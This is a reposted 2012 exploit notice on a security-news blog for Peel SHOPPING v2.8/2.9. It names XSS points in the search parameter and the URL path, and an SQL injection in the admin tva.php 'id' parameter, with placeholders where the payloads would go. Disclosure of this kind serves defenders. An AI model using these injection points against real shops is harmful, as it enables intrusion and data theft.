[webapps / 0day] – Peel SHOPPING => v2.9 xss/sql injection vulnerability

Feb.06, 2012 in Exploits

+————————————————————————-+

# Exploit Title : Peel SHOPPING – version 2.8 and version 2.9 xss/sql inject Vulnerability
# version : v2.9
# Author : Cyber-Crystal
# Date : n/a
# Software Link : http://www.peel.fr/ || or http://www.easy-script.com/scripts-PHP/peel-v29-4308.html
+————————————————————————-+

[+] Exploits

http://localhost/peel/index.php/achat/recherche.php?motclef=[Xss Here ]&action=Rechercher

http://localhost/peel/administrer/tva.php?mode=modif&id=[SQL]

http://localhost/peel/index.php/[XSS]

# [1337day.com][1] [2012-01-26]

[1]: http://www.1337day.com/

Source: http://www.1337day.com/exploits/17445

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News

M	T	W	T	F	S	S
« Jan				Mar »
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

[webapps / 0day] – Peel SHOPPING => v2.9 xss/sql injection vulnerability

Leave a Reply

Quote

Categories

Calendar

Recent Posts